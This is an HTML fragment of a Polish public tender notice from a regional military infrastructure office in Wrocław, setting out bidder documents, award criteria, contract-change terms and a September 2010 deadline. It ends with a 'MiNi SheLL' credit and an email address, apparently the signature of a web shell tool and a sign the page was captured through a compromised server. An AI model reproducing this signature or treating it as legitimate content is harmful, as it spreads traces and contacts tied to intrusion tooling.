<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w przypadku: 
1) stwierdzenia, że w dokumentacji projektowej przekazanej przez Wykonawcę zgodnie z § 1 ust. 2 umowy, znajdują się błędy uniemożliwiające prawidłowe i terminowe wykonanie przedmiotu umowy - zmiana terminu wykonania umowy;
2) zmniejszenia lub zwiększenia ilości jednostek obmiarowych - w zakresie mającym wpływ na ustaloną kwotę wynagrodzenia i terminu wykonania - zmiana kwoty wynagrodzenia, zmiana terminu realizacji; 
3) obiektywie uzasadnionej konieczności wprowadzenia zmiany technologii wykonania przedmiotu umowy - zmiana ustalonego wynagrodzenia, zmiana terminu wykonania. Zmiana zakresu prac określonych w SIWZ jest możliwa tylko w zakresie niezbędnym do zgodnego a obowiązującymi standardami, wymaganiami technicznymi oraz normami prawidłowego wykonania przedmiotu umowy;
4) zaistnienie niezależnych od Wykonawcy przeszkód, działanie siły wyższej, uniemożliwiających wykonanie przedmiotu umowy w ustalonym terminie;
5) zaistnienie zdarzeń losowych powodujących konieczność zmiany przedstawiciela strony wpisanej do umowy;
6) uzasadniona nieprzewidzianymi okolicznościami zmiana zakresu robót realizowanych przy udziale podwykonawcy;
7) zmiany limitów finansowych określonych w centralnych planach rzeczowych resortu obrony narodowej - zmiana terminu realizacji przedmiotu umowy oraz zmiana wysokości limitów.
2.  Wszelkie zmiany do niniejszej umowy wymagają pod rygorem nieważności zachowania formy pisemnej w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzi.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> REJONOWY ZARZĄD INFRASTRUKTURY  WE WROCŁAWIU
50 - 984 Wrocław, ul. Obornicka 126.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2010 godzina 10:00, miejsce: Siedziba Zamawiającego - kancelaria pok. 101..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com